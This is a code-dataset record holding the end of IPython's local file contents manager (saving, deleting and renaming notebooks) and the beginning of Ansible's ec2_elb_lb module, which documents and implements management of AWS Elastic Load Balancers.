os_path = self._get_os_path(path)
if os.path.isdir(os_path):
if type not in (None, 'directory'):
raise web.HTTPError(400,
u'%s is a directory, not a %s' % (path, type), reason='bad type')
model = self._dir_model(path, content=content)
elif type == 'notebook' or (type is None and path.endswith('.ipynb')):
model = self._notebook_model(path, content=content)
else:
if type == 'directory':
raise web.HTTPError(400,
u'%s is not a directory' % path, reason='bad type')
model = self._file_model(path, content=content, format=format)
return model
def _save_directory(self, os_path, model, path=''):
"""create a directory"""
if is_hidden(os_path, self.root_dir):
raise web.HTTPError(400, u'Cannot create hidden directory %r' % os_path)
if not os.path.exists(os_path):
with self.perm_to_403():
os.mkdir(os_path)
elif not os.path.isdir(os_path):
raise web.HTTPError(400, u'Not a directory: %s' % (os_path))
else:
self.log.debug("Directory %r already exists", os_path)
def save(self, model, path=''):
"""Save the file model and return the model with no content."""
path = path.strip('/')
if 'type' not in model:
raise web.HTTPError(400, u'No file type provided')
if 'content' not in model and model['type'] != 'directory':
raise web.HTTPError(400, u'No file content provided')
os_path = self._get_os_path(path)
self.log.debug("Saving %s", os_path)
self.run_pre_save_hook(model=model, path=path)
try:
if model['type'] == 'notebook':
nb = nbformat.from_dict(model['content'])
self.check_and_sign(nb, path)
self._save_notebook(os_path, nb)
# One checkpoint should always exist for notebooks.
if not self.checkpoints.list_checkpoints(path):
self.create_checkpoint(path)
elif model['type'] == 'file':
# Missing format will be handled internally by _save_file.
self._save_file(os_path, model['content'], model.get('format'))
elif model['type'] == 'directory':
self._save_directory(os_path, model, path)
else:
raise web.HTTPError(400, "Unhandled contents type: %s" % model['type'])
except web.HTTPError:
raise
except Exception as e:
self.log.error(u'Error while saving file: %s %s', path, e, exc_info=True)
raise web.HTTPError(500, u'Unexpected error while saving file: %s %s' % (path, e))
validation_message = None
if model['type'] == 'notebook':
self.validate_notebook_model(model)
validation_message = model.get('message', None)
model = self.get(path, content=False)
if validation_message:
model['message'] = validation_message
self.run_post_save_hook(model=model, os_path=os_path)
return model
def delete_file(self, path):
"""Delete file at path."""
path = path.strip('/')
os_path = self._get_os_path(path)
rm = os.unlink
if os.path.isdir(os_path):
listing = os.listdir(os_path)
# Don't delete non-empty directories.
# A directory containing only leftover checkpoints is
# considered empty.
cp_dir = getattr(self.checkpoints, 'checkpoint_dir', None)
for entry in listing:
if entry != cp_dir:
raise web.HTTPError(400, u'Directory %s not empty' % os_path)
elif not os.path.isfile(os_path):
raise web.HTTPError(404, u'File does not exist: %s' % os_path)
if os.path.isdir(os_path):
self.log.debug("Removing directory %s", os_path)
with self.perm_to_403():
shutil.rmtree(os_path)
else:
self.log.debug("Unlinking file %s", os_path)
with self.perm_to_403():
rm(os_path)
def rename_file(self, old_path, new_path):
"""Rename a file."""
old_path = old_path.strip('/')
new_path = new_path.strip('/')
if new_path == old_path:
return
new_os_path = self._get_os_path(new_path)
old_os_path = self._get_os_path(old_path)
# Should we proceed with the move?
if os.path.exists(new_os_path):
raise web.HTTPError(409, u'File already exists: %s' % new_path)
# Move the file
try:
with self.perm_to_403():
shutil.move(old_os_path, new_os_path)
except web.HTTPError:
raise
except Exception as e:
raise web.HTTPError(500, u'Unknown error renaming file: %s %s' % (old_path, e))
def info_string(self):
return "Serving notebooks from local directory: %s" % self.root_dir
def get_kernel_path(self, path, model=None):
"""Return the initial API path of a kernel associated with a given notebook"""
if '/' in path:
parent_dir = path.rsplit('/', 1)[0]
else:
parent_dir = ''
return parent_dir
|
madelynfreed/rlundo
|
venv/lib/python2.7/site-packages/IPython/html/services/contents/filemanager.py
|
Python
|
gpl-3.0
| 16,487
|
#!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['stableinterface'],
'supported_by': 'curated'}
DOCUMENTATION = """
---
module: ec2_elb_lb
description:
- Returns information about the load balancer.
- Will be marked changed when called only if state is changed.
short_description: Creates or destroys Amazon ELB.
version_added: "1.5"
author:
- "Jim Dalton (@jsdalton)"
options:
state:
description:
- Create or destroy the ELB
choices: ["present", "absent"]
required: true
name:
description:
- The name of the ELB
required: true
listeners:
description:
- List of ports/protocols for this ELB to listen on (see example)
required: false
purge_listeners:
description:
- Purge existing listeners on ELB that are not found in listeners
required: false
default: true
instance_ids:
description:
- List of instance ids to attach to this ELB
required: false
default: false
version_added: "2.1"
purge_instance_ids:
description:
- Purge existing instance ids on ELB that are not found in instance_ids
required: false
default: false
version_added: "2.1"
zones:
description:
- List of availability zones to enable on this ELB
required: false
purge_zones:
description:
- Purge existing availability zones on ELB that are not found in zones
required: false
default: false
security_group_ids:
description:
- A list of security groups to apply to the elb
required: false
default: None
version_added: "1.6"
security_group_names:
description:
- A list of security group names to apply to the elb
required: false
default: None
version_added: "2.0"
health_check:
description:
- An associative array of health check configuration settings (see example)
required: false
default: None
access_logs:
description:
- An associative array of access logs configuration settings (see example)
required: false
default: None
version_added: "2.0"
subnets:
description:
- A list of VPC subnets to use when creating ELB. Zones should be empty if using this.
required: false
default: None
aliases: []
version_added: "1.7"
purge_subnets:
description:
- Purge existing subnet on ELB that are not found in subnets
required: false
default: false
version_added: "1.7"
scheme:
description:
- The scheme to use when creating the ELB. For a private VPC-visible ELB use 'internal'.
required: false
default: 'internet-facing'
version_added: "1.7"
validate_certs:
description:
- When set to "no", SSL certificates will not be validated for boto versions >= 2.6.0.
required: false
default: "yes"
choices: ["yes", "no"]
aliases: []
version_added: "1.5"
connection_draining_timeout:
description:
- Wait a specified timeout allowing connections to drain before terminating an instance
required: false
aliases: []
version_added: "1.8"
idle_timeout:
description:
- ELB connections from clients and to servers are timed out after this amount of time
required: false
version_added: "2.0"
cross_az_load_balancing:
description:
- Distribute load across all configured Availability Zones
required: false
default: "no"
choices: ["yes", "no"]
aliases: []
version_added: "1.8"
stickiness:
description:
      - An associative array of stickiness policy settings. Policy will be applied to all listeners (see example)
required: false
version_added: "2.0"
wait:
description:
- When specified, Ansible will check the status of the load balancer to ensure it has been successfully
removed from AWS.
required: false
default: no
choices: ["yes", "no"]
version_added: "2.1"
wait_timeout:
description:
- Used in conjunction with wait. Number of seconds to wait for the elb to be terminated.
A maximum of 600 seconds (10 minutes) is allowed.
required: false
default: 60
version_added: "2.1"
tags:
description:
- An associative array of tags. To delete all tags, supply an empty dict.
required: false
version_added: "2.1"
extends_documentation_fragment:
- aws
- ec2
"""
EXAMPLES = """
# Note: None of these examples set aws_access_key, aws_secret_key, or region.
# It is assumed that their matching environment variables are set.
# Basic provisioning example (non-VPC)
- local_action:
module: ec2_elb_lb
name: "test-please-delete"
state: present
zones:
- us-east-1a
- us-east-1d
listeners:
- protocol: http # options are http, https, ssl, tcp
load_balancer_port: 80
instance_port: 80
proxy_protocol: True
- protocol: https
load_balancer_port: 443
instance_protocol: http # optional, defaults to value of protocol setting
instance_port: 80
# ssl certificate required for https or ssl
ssl_certificate_id: "arn:aws:iam::123456789012:server-certificate/company/servercerts/ProdServerCert"
# Internal ELB example
- local_action:
module: ec2_elb_lb
name: "test-vpc"
scheme: internal
state: present
instance_ids:
- i-abcd1234
purge_instance_ids: true
subnets:
- subnet-abcd1234
- subnet-1a2b3c4d
listeners:
- protocol: http # options are http, https, ssl, tcp
load_balancer_port: 80
instance_port: 80
# Configure a health check and the access logs
- local_action:
module: ec2_elb_lb
name: "test-please-delete"
state: present
zones:
- us-east-1d
listeners:
- protocol: http
load_balancer_port: 80
instance_port: 80
health_check:
ping_protocol: http # options are http, https, ssl, tcp
ping_port: 80
ping_path: "/index.html" # not required for tcp or ssl
response_timeout: 5 # seconds
interval: 30 # seconds
unhealthy_threshold: 2
healthy_threshold: 10
access_logs:
interval: 5 # minutes (defaults to 60)
s3_location: "my-bucket" # This value is required if access_logs is set
s3_prefix: "logs"
# Ensure ELB is gone
- local_action:
module: ec2_elb_lb
name: "test-please-delete"
state: absent
# Ensure ELB is gone and wait for check (for default timeout)
- local_action:
module: ec2_elb_lb
name: "test-please-delete"
state: absent
wait: yes
# Ensure ELB is gone and wait for check with timeout value
- local_action:
module: ec2_elb_lb
name: "test-please-delete"
state: absent
wait: yes
wait_timeout: 600
# Normally, this module will purge any listeners that exist on the ELB
# but aren't specified in the listeners parameter. If purge_listeners is
# false it leaves them alone
- local_action:
module: ec2_elb_lb
name: "test-please-delete"
state: present
zones:
- us-east-1a
- us-east-1d
listeners:
- protocol: http
load_balancer_port: 80
instance_port: 80
purge_listeners: no
# Normally, this module will leave availability zones that are enabled
# on the ELB alone. If purge_zones is true, then any extraneous zones
# will be removed
- local_action:
module: ec2_elb_lb
name: "test-please-delete"
state: present
zones:
- us-east-1a
- us-east-1d
listeners:
- protocol: http
load_balancer_port: 80
instance_port: 80
purge_zones: yes
# Creates a ELB and assigns a list of subnets to it.
- local_action:
module: ec2_elb_lb
state: present
name: 'New ELB'
security_group_ids: 'sg-123456, sg-67890'
region: us-west-2
subnets: 'subnet-123456,subnet-67890'
purge_subnets: yes
listeners:
- protocol: http
load_balancer_port: 80
instance_port: 80
# Create an ELB with connection draining, increased idle timeout and cross availability
# zone load balancing
- local_action:
module: ec2_elb_lb
name: "New ELB"
state: present
connection_draining_timeout: 60
idle_timeout: 300
cross_az_load_balancing: "yes"
region: us-east-1
zones:
- us-east-1a
- us-east-1d
listeners:
- protocol: http
load_balancer_port: 80
instance_port: 80
# Create an ELB with load balancer stickiness enabled
- local_action:
module: ec2_elb_lb
name: "New ELB"
state: present
region: us-east-1
zones:
- us-east-1a
- us-east-1d
listeners:
- protocol: http
load_balancer_port: 80
instance_port: 80
stickiness:
type: loadbalancer
enabled: yes
expiration: 300
# Create an ELB with application stickiness enabled
- local_action:
module: ec2_elb_lb
name: "New ELB"
state: present
region: us-east-1
zones:
- us-east-1a
- us-east-1d
listeners:
- protocol: http
load_balancer_port: 80
instance_port: 80
stickiness:
type: application
enabled: yes
cookie: SESSIONID
# Create an ELB and add tags
- local_action:
module: ec2_elb_lb
name: "New ELB"
state: present
region: us-east-1
zones:
- us-east-1a
- us-east-1d
listeners:
- protocol: http
load_balancer_port: 80
instance_port: 80
tags:
Name: "New ELB"
stack: "production"
client: "Bob"
# Delete all tags from an ELB
- local_action:
module: ec2_elb_lb
name: "New ELB"
state: present
region: us-east-1
zones:
- us-east-1a
- us-east-1d
listeners:
- protocol: http
load_balancer_port: 80
instance_port: 80
tags: {}
"""
try:
import boto
import boto.ec2.elb
import boto.ec2.elb.attributes
import boto.vpc
from boto.ec2.elb.healthcheck import HealthCheck
from boto.ec2.tag import Tag
HAS_BOTO = True
except ImportError:
HAS_BOTO = False
import time
import traceback
import random
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ec2 import ec2_argument_spec, connect_to_aws, AnsibleAWSError
from ansible.module_utils.ec2 import get_aws_connection_info
def _throttleable_operation(max_retries):
def _operation_wrapper(op):
def _do_op(*args, **kwargs):
retry = 0
while True:
try:
return op(*args, **kwargs)
except boto.exception.BotoServerError as e:
if retry < max_retries and e.code in \
("Throttling", "RequestLimitExceeded"):
retry = retry + 1
time.sleep(min(random.random() * (2 ** retry), 300))
continue
else:
raise
return _do_op
return _operation_wrapper
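# The decorator factory above retries a throttled ELB API call: on a
# BotoServerError whose code is "Throttling" or "RequestLimitExceeded" it
# sleeps for a jittered, exponentially growing interval
# (random() * 2**retry seconds, capped at 300) and tries again, for up to
# max_retries retries. Illustrative usage, mirroring how it is applied to
# methods further down in this file:
#
#     @_throttleable_operation(_THROTTLING_RETRIES)
#     def _get_elb(self):
#         return self.elb_conn.get_all_load_balancers()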
def _get_vpc_connection(module, region, aws_connect_params):
try:
return connect_to_aws(boto.vpc, region, **aws_connect_params)
except (boto.exception.NoAuthHandlerFound, AnsibleAWSError) as e:
module.fail_json(msg=str(e))
_THROTTLING_RETRIES = 5
class ElbManager(object):
"""Handles ELB creation and destruction"""
def __init__(self, module, name, listeners=None, purge_listeners=None,
zones=None, purge_zones=None, security_group_ids=None,
health_check=None, subnets=None, purge_subnets=None,
scheme="internet-facing", connection_draining_timeout=None,
idle_timeout=None,
cross_az_load_balancing=None, access_logs=None,
stickiness=None, wait=None, wait_timeout=None, tags=None,
region=None,
instance_ids=None, purge_instance_ids=None, **aws_connect_params):
self.module = module
self.name = name
self.listeners = listeners
self.purge_listeners = purge_listeners
self.instance_ids = instance_ids
self.purge_instance_ids = purge_instance_ids
self.zones = zones
self.purge_zones = purge_zones
self.security_group_ids = security_group_ids
self.health_check = health_check
self.subnets = subnets
self.purge_subnets = purge_subnets
self.scheme = scheme
self.connection_draining_timeout = connection_draining_timeout
self.idle_timeout = idle_timeout
self.cross_az_load_balancing = cross_az_load_balancing
self.access_logs = access_logs
self.stickiness = stickiness
self.wait = wait
self.wait_timeout = wait_timeout
self.tags = tags
self.aws_connect_params = aws_connect_params
self.region = region
self.changed = False
self.status = 'gone'
self.elb_conn = self._get_elb_connection()
try:
self.elb = self._get_elb()
except boto.exception.BotoServerError as e:
module.fail_json(msg='unable to get all load balancers: %s' % e.message, exception=traceback.format_exc())
self.ec2_conn = self._get_ec2_connection()
@_throttleable_operation(_THROTTLING_RETRIES)
def ensure_ok(self):
"""Create the ELB"""
if not self.elb:
# Zones and listeners will be added at creation
self._create_elb()
else:
self._set_zones()
self._set_security_groups()
self._set_elb_listeners()
self._set_subnets()
self._set_health_check()
# boto has introduced support for some ELB attributes in
# different versions, so we check first before trying to
# set them to avoid errors
if self._check_attribute_support('connection_draining'):
self._set_connection_draining_timeout()
if self._check_attribute_support('connecting_settings'):
self._set_idle_timeout()
if self._check_attribute_support('cross_zone_load_balancing'):
self._set_cross_az_load_balancing()
if self._check_attribute_support('access_log'):
self._set_access_log()
        # add sticky (stickiness policy) options
self.select_stickiness_policy()
# ensure backend server policies are correct
self._set_backend_policies()
# set/remove instance ids
self._set_instance_ids()
self._set_tags()
def ensure_gone(self):
"""Destroy the ELB"""
if self.elb:
self._delete_elb()
if self.wait:
elb_removed = self._wait_for_elb_removed()
# Unfortunately even though the ELB itself is removed quickly
# the interfaces take longer so reliant security groups cannot
# be deleted until the interface has registered as removed.
elb_interface_removed = self._wait_for_elb_interface_removed()
if not (elb_removed and elb_interface_removed):
self.module.fail_json(msg='Timed out waiting for removal of load balancer.')
def get_info(self):
try:
check_elb = self.elb_conn.get_all_load_balancers(self.name)[0]
except:
check_elb = None
if not check_elb:
info = {
'name': self.name,
'status': self.status,
'region': self.region
}
else:
try:
lb_cookie_policy = check_elb.policies.lb_cookie_stickiness_policies[0].__dict__['policy_name']
except:
lb_cookie_policy = None
try:
app_cookie_policy = check_elb.policies.app_cookie_stickiness_policies[0].__dict__['policy_name']
except:
app_cookie_policy = None
info = {
'name': check_elb.name,
'dns_name': check_elb.dns_name,
'zones': check_elb.availability_zones,
'security_group_ids': check_elb.security_groups,
'status': self.status,
'subnets': self.subnets,
'scheme': check_elb.scheme,
'hosted_zone_name': check_elb.canonical_hosted_zone_name,
'hosted_zone_id': check_elb.canonical_hosted_zone_name_id,
'lb_cookie_policy': lb_cookie_policy,
'app_cookie_policy': app_cookie_policy,
'proxy_policy': self._get_proxy_protocol_policy(),
'backends': self._get_backend_policies(),
'instances': [instance.id for instance in check_elb.instances],
'out_of_service_count': 0,
'in_service_count': 0,
'unknown_instance_state_count': 0,
'region': self.region
}
# status of instances behind the ELB
if info['instances']:
info['instance_health'] = [ dict(
instance_id = instance_state.instance_id,
reason_code = instance_state.reason_code,
state = instance_state.state
) for instance_state in self.elb_conn.describe_instance_health(self.name)]
else:
info['instance_health'] = []
# instance state counts: InService or OutOfService
if info['instance_health']:
for instance_state in info['instance_health']:
if instance_state['state'] == "InService":
info['in_service_count'] += 1
elif instance_state['state'] == "OutOfService":
info['out_of_service_count'] += 1
else:
info['unknown_instance_state_count'] += 1
if check_elb.health_check:
info['health_check'] = {
'target': check_elb.health_check.target,
'interval': check_elb.health_check.interval,
'timeout': check_elb.health_check.timeout,
'healthy_threshold': check_elb.health_check.healthy_threshold,
'unhealthy_threshold': check_elb.health_check.unhealthy_threshold,
}
if check_elb.listeners:
info['listeners'] = [self._api_listener_as_tuple(l)
for l in check_elb.listeners]
elif self.status == 'created':
# When creating a new ELB, listeners don't show in the
# immediately returned result, so just include the
# ones that were added
info['listeners'] = [self._listener_as_tuple(l)
for l in self.listeners]
else:
info['listeners'] = []
if self._check_attribute_support('connection_draining'):
info['connection_draining_timeout'] = int(self.elb_conn.get_lb_attribute(self.name, 'ConnectionDraining').timeout)
if self._check_attribute_support('connecting_settings'):
info['idle_timeout'] = self.elb_conn.get_lb_attribute(self.name, 'ConnectingSettings').idle_timeout
if self._check_attribute_support('cross_zone_load_balancing'):
is_cross_az_lb_enabled = self.elb_conn.get_lb_attribute(self.name, 'CrossZoneLoadBalancing')
if is_cross_az_lb_enabled:
info['cross_az_load_balancing'] = 'yes'
else:
info['cross_az_load_balancing'] = 'no'
# return stickiness info?
info['tags'] = self.tags
return info
@_throttleable_operation(_THROTTLING_RETRIES)
def _wait_for_elb_removed(self):
polling_increment_secs = 15
max_retries = (self.wait_timeout / polling_increment_secs)
status_achieved = False
for x in range(0, max_retries):
try:
self.elb_conn.get_all_lb_attributes(self.name)
except (boto.exception.BotoServerError, StandardError) as e:
if "LoadBalancerNotFound" in e.code:
status_achieved = True
break
else:
time.sleep(polling_increment_secs)
return status_achieved
@_throttleable_operation(_THROTTLING_RETRIES)
def _wait_for_elb_interface_removed(self):
polling_increment_secs = 15
max_retries = (self.wait_timeout / polling_increment_secs)
status_achieved = False
elb_interfaces = self.ec2_conn.get_all_network_interfaces(
filters={'attachment.instance-owner-id': 'amazon-elb',
'description': 'ELB {0}'.format(self.name) })
for x in range(0, max_retries):
for interface in elb_interfaces:
try:
result = self.ec2_conn.get_all_network_interfaces(interface.id)
if result == []:
status_achieved = True
break
else:
time.sleep(polling_increment_secs)
except (boto.exception.BotoServerError, StandardError) as e:
if 'InvalidNetworkInterfaceID' in e.code:
status_achieved = True
break
else:
self.module.fail_json(msg=str(e))
return status_achieved
@_throttleable_operation(_THROTTLING_RETRIES)
def _get_elb(self):
elbs = self.elb_conn.get_all_load_balancers()
for elb in elbs:
if self.name == elb.name:
self.status = 'ok'
return elb
def _get_elb_connection(self):
try:
return connect_to_aws(boto.ec2.elb, self.region,
**self.aws_connect_params)
except (boto.exception.NoAuthHandlerFound, AnsibleAWSError) as e:
self.module.fail_json(msg=str(e))
def _get_ec2_connection(self):
try:
return connect_to_aws(boto.ec2, self.region,
**self.aws_connect_params)
except (boto.exception.NoAuthHandlerFound, StandardError) as e:
self.module.fail_json(msg=str(e))
@_throttleable_operation(_THROTTLING_RETRIES)
def _delete_elb(self):
# True if succeeds, exception raised if not
result = self.elb_conn.delete_load_balancer(name=self.name)
if result:
self.changed = True
self.status = 'deleted'
def _create_elb(self):
listeners = [self._listener_as_tuple(l) for l in self.listeners]
self.elb = self.elb_conn.create_load_balancer(name=self.name,
zones=self.zones,
security_groups=self.security_group_ids,
complex_listeners=listeners,
subnets=self.subnets,
scheme=self.scheme)
if self.elb:
# HACK: Work around a boto bug in which the listeners attribute is
# always set to the listeners argument to create_load_balancer, and
# not the complex_listeners
# We're not doing a self.elb = self._get_elb here because there
# might be eventual consistency issues and it doesn't necessarily
# make sense to wait until the ELB gets returned from the EC2 API.
# This is necessary in the event we hit the throttling errors and
# need to retry ensure_ok
# See https://github.com/boto/boto/issues/3526
self.elb.listeners = self.listeners
self.changed = True
self.status = 'created'
def _create_elb_listeners(self, listeners):
"""Takes a list of listener tuples and creates them"""
# True if succeeds, exception raised if not
self.changed = self.elb_conn.create_load_balancer_listeners(self.name,
complex_listeners=listeners)
def _delete_elb_listeners(self, listeners):
"""Takes a list of listener tuples and deletes them from the elb"""
ports = [l[0] for l in listeners]
# True if succeeds, exception raised if not
self.changed = self.elb_conn.delete_load_balancer_listeners(self.name,
ports)
def _set_elb_listeners(self):
"""
Creates listeners specified by self.listeners; overwrites existing
listeners on these ports; removes extraneous listeners
"""
listeners_to_add = []
listeners_to_remove = []
listeners_to_keep = []
# Check for any listeners we need to create or overwrite
for listener in self.listeners:
listener_as_tuple = self._listener_as_tuple(listener)
# First we loop through existing listeners to see if one is
# already specified for this port
existing_listener_found = None
for existing_listener in self.elb.listeners:
# Since ELB allows only one listener on each incoming port, a
# single match on the incoming port is all we're looking for
if existing_listener[0] == int(listener['load_balancer_port']):
existing_listener_found = self._api_listener_as_tuple(existing_listener)
break
if existing_listener_found:
# Does it match exactly?
if listener_as_tuple != existing_listener_found:
# The ports are the same but something else is different,
# so we'll remove the existing one and add the new one
listeners_to_remove.append(existing_listener_found)
listeners_to_add.append(listener_as_tuple)
else:
# We already have this listener, so we're going to keep it
listeners_to_keep.append(existing_listener_found)
else:
# We didn't find an existing listener, so just add the new one
listeners_to_add.append(listener_as_tuple)
# Check for any extraneous listeners we need to remove, if desired
if self.purge_listeners:
for existing_listener in self.elb.listeners:
existing_listener_tuple = self._api_listener_as_tuple(existing_listener)
if existing_listener_tuple in listeners_to_remove:
# Already queued for removal
continue
if existing_listener_tuple in listeners_to_keep:
# Keep this one around
continue
# Since we're not already removing it and we don't need to keep
# it, let's get rid of it
listeners_to_remove.append(existing_listener_tuple)
if listeners_to_remove:
self._delete_elb_listeners(listeners_to_remove)
if listeners_to_add:
self._create_elb_listeners(listeners_to_add)
def _api_listener_as_tuple(self, listener):
"""Adds ssl_certificate_id to ELB API tuple if present"""
base_tuple = listener.get_complex_tuple()
if listener.ssl_certificate_id and len(base_tuple) < 5:
return base_tuple + (listener.ssl_certificate_id,)
return base_tuple
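    # Note: boto's Listener.get_complex_tuple() returns (load_balancer_port,
    # instance_port, protocol, instance_protocol); appending the certificate id
    # above keeps API-derived tuples comparable with the output of
    # _listener_as_tuple() for HTTPS/SSL listeners.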
def _listener_as_tuple(self, listener):
"""Formats listener as a 4- or 5-tuples, in the order specified by the
ELB API"""
# N.B. string manipulations on protocols below (str(), upper()) is to
# ensure format matches output from ELB API
listener_list = [
int(listener['load_balancer_port']),
int(listener['instance_port']),
str(listener['protocol'].upper()),
]
# Instance protocol is not required by ELB API; it defaults to match
# load balancer protocol. We'll mimic that behavior here
if 'instance_protocol' in listener:
listener_list.append(str(listener['instance_protocol'].upper()))
else:
listener_list.append(str(listener['protocol'].upper()))
if 'ssl_certificate_id' in listener:
listener_list.append(str(listener['ssl_certificate_id']))
return tuple(listener_list)
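    # Illustrative mapping: {'protocol': 'http', 'load_balancer_port': 80,
    # 'instance_port': 80} becomes (80, 80, 'HTTP', 'HTTP'); supplying
    # 'ssl_certificate_id' extends the result to a 5-tuple ending in the ARN.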
def _enable_zones(self, zones):
try:
self.elb.enable_zones(zones)
except boto.exception.BotoServerError as e:
self.module.fail_json(msg='unable to enable zones: %s' % e.message, exception=traceback.format_exc())
self.changed = True
def _disable_zones(self, zones):
try:
self.elb.disable_zones(zones)
except boto.exception.BotoServerError as e:
self.module.fail_json(msg='unable to disable zones: %s' % e.message, exception=traceback.format_exc())
self.changed = True
def _attach_subnets(self, subnets):
self.elb_conn.attach_lb_to_subnets(self.name, subnets)
self.changed = True
def _detach_subnets(self, subnets):
self.elb_conn.detach_lb_from_subnets(self.name, subnets)
self.changed = True
def _set_subnets(self):
"""Determine which subnets need to be attached or detached on the ELB"""
if self.subnets:
if self.purge_subnets:
subnets_to_detach = list(set(self.elb.subnets) - set(self.subnets))
subnets_to_attach = list(set(self.subnets) - set(self.elb.subnets))
else:
subnets_to_detach = None
subnets_to_attach = list(set(self.subnets) - set(self.elb.subnets))
if subnets_to_attach:
self._attach_subnets(subnets_to_attach)
if subnets_to_detach:
self._detach_subnets(subnets_to_detach)
def _set_zones(self):
"""Determine which zones need to be enabled or disabled on the ELB"""
if self.zones:
if self.purge_zones:
zones_to_disable = list(set(self.elb.availability_zones) -
set(self.zones))
zones_to_enable = list(set(self.zones) -
set(self.elb.availability_zones))
else:
zones_to_disable = None
zones_to_enable = list(set(self.zones) -
set(self.elb.availability_zones))
if zones_to_enable:
self._enable_zones(zones_to_enable)
# N.B. This must come second, in case it would have removed all zones
if zones_to_disable:
self._disable_zones(zones_to_disable)
def _set_security_groups(self):
if self.security_group_ids is not None and set(self.elb.security_groups) != set(self.security_group_ids):
self.elb_conn.apply_security_groups_to_lb(self.name, self.security_group_ids)
self.changed = True
def _set_health_check(self):
"""Set health check values on ELB as needed"""
if self.health_check:
# This just makes it easier to compare each of the attributes
# and look for changes. Keys are attributes of the current
# health_check; values are desired values of new health_check
health_check_config = {
"target": self._get_health_check_target(),
"timeout": self.health_check['response_timeout'],
"interval": self.health_check['interval'],
"unhealthy_threshold": self.health_check['unhealthy_threshold'],
"healthy_threshold": self.health_check['healthy_threshold'],
}
update_health_check = False
# The health_check attribute is *not* set on newly created
# ELBs! So we have to create our own.
if not self.elb.health_check:
self.elb.health_check = HealthCheck()
for attr, desired_value in health_check_config.items():
if getattr(self.elb.health_check, attr) != desired_value:
setattr(self.elb.health_check, attr, desired_value)
update_health_check = True
if update_health_check:
self.elb.configure_health_check(self.elb.health_check)
self.changed = True
def _check_attribute_support(self, attr):
return hasattr(boto.ec2.elb.attributes.LbAttributes(), attr)
def _set_cross_az_load_balancing(self):
attributes = self.elb.get_attributes()
if self.cross_az_load_balancing:
if not attributes.cross_zone_load_balancing.enabled:
self.changed = True
attributes.cross_zone_load_balancing.enabled = True
else:
if attributes.cross_zone_load_balancing.enabled:
self.changed = True
attributes.cross_zone_load_balancing.enabled = False
self.elb_conn.modify_lb_attribute(self.name, 'CrossZoneLoadBalancing',
attributes.cross_zone_load_balancing.enabled)
def _set_access_log(self):
attributes = self.elb.get_attributes()
if self.access_logs:
if 's3_location' not in self.access_logs:
self.module.fail_json(msg='s3_location information required')
access_logs_config = {
"enabled": True,
"s3_bucket_name": self.access_logs['s3_location'],
"s3_bucket_prefix": self.access_logs.get('s3_prefix', ''),
"emit_interval": self.access_logs.get('interval', 60),
}
update_access_logs_config = False
for attr, desired_value in access_logs_config.items():
if getattr(attributes.access_log, attr) != desired_value:
setattr(attributes.access_log, attr, desired_value)
update_access_logs_config = True
if update_access_logs_config:
self.elb_conn.modify_lb_attribute(self.name, 'AccessLog', attributes.access_log)
self.changed = True
elif attributes.access_log.enabled:
attributes.access_log.enabled = False
self.changed = True
self.elb_conn.modify_lb_attribute(self.name, 'AccessLog', attributes.access_log)
def _set_connection_draining_timeout(self):
attributes = self.elb.get_attributes()
if self.connection_draining_timeout is not None:
if not attributes.connection_draining.enabled or \
attributes.connection_draining.timeout != self.connection_draining_timeout:
self.changed = True
attributes.connection_draining.enabled = True
attributes.connection_draining.timeout = self.connection_draining_timeout
self.elb_conn.modify_lb_attribute(self.name, 'ConnectionDraining', attributes.connection_draining)
else:
if attributes.connection_draining.enabled:
self.changed = True
attributes.connection_draining.enabled = False
self.elb_conn.modify_lb_attribute(self.name, 'ConnectionDraining', attributes.connection_draining)
def _set_idle_timeout(self):
attributes = self.elb.get_attributes()
if self.idle_timeout is not None:
if attributes.connecting_settings.idle_timeout != self.idle_timeout:
self.changed = True
attributes.connecting_settings.idle_timeout = self.idle_timeout
self.elb_conn.modify_lb_attribute(self.name, 'ConnectingSettings', attributes.connecting_settings)
def _policy_name(self, policy_type):
return __file__.split('/')[-1].split('.')[0].replace('_', '-') + '-' + policy_type
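    # e.g. for this module file, _policy_name('LBCookieStickinessPolicyType')
    # yields 'ec2-elb-lb-LBCookieStickinessPolicyType'.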
def _create_policy(self, policy_param, policy_meth, policy):
getattr(self.elb_conn, policy_meth )(policy_param, self.elb.name, policy)
def _delete_policy(self, elb_name, policy):
self.elb_conn.delete_lb_policy(elb_name, policy)
def _update_policy(self, policy_param, policy_meth, policy_attr, policy):
self._delete_policy(self.elb.name, policy)
self._create_policy(policy_param, policy_meth, policy)
def _set_listener_policy(self, listeners_dict, policy=[]):
for listener_port in listeners_dict:
if listeners_dict[listener_port].startswith('HTTP'):
self.elb_conn.set_lb_policies_of_listener(self.elb.name, listener_port, policy)
def _set_stickiness_policy(self, elb_info, listeners_dict, policy, **policy_attrs):
for p in getattr(elb_info.policies, policy_attrs['attr']):
if str(p.__dict__['policy_name']) == str(policy[0]):
if str(p.__dict__[policy_attrs['dict_key']]) != str(policy_attrs['param_value'] or 0):
self._set_listener_policy(listeners_dict)
self._update_policy(policy_attrs['param_value'], policy_attrs['method'], policy_attrs['attr'], policy[0])
self.changed = True
break
else:
self._create_policy(policy_attrs['param_value'], policy_attrs['method'], policy[0])
self.changed = True
self._set_listener_policy(listeners_dict, policy)
def select_stickiness_policy(self):
if self.stickiness:
if 'cookie' in self.stickiness and 'expiration' in self.stickiness:
self.module.fail_json(msg='\'cookie\' and \'expiration\' can not be set at the same time')
elb_info = self.elb_conn.get_all_load_balancers(self.elb.name)[0]
d = {}
for listener in elb_info.listeners:
d[listener[0]] = listener[2]
listeners_dict = d
if self.stickiness['type'] == 'loadbalancer':
policy = []
policy_type = 'LBCookieStickinessPolicyType'
if self.module.boolean(self.stickiness['enabled']):
if 'expiration' not in self.stickiness:
self.module.fail_json(msg='expiration must be set when type is loadbalancer')
                    expiration = self.stickiness['expiration'] if self.stickiness['expiration'] != 0 else None
policy_attrs = {
'type': policy_type,
'attr': 'lb_cookie_stickiness_policies',
'method': 'create_lb_cookie_stickiness_policy',
'dict_key': 'cookie_expiration_period',
'param_value': expiration
}
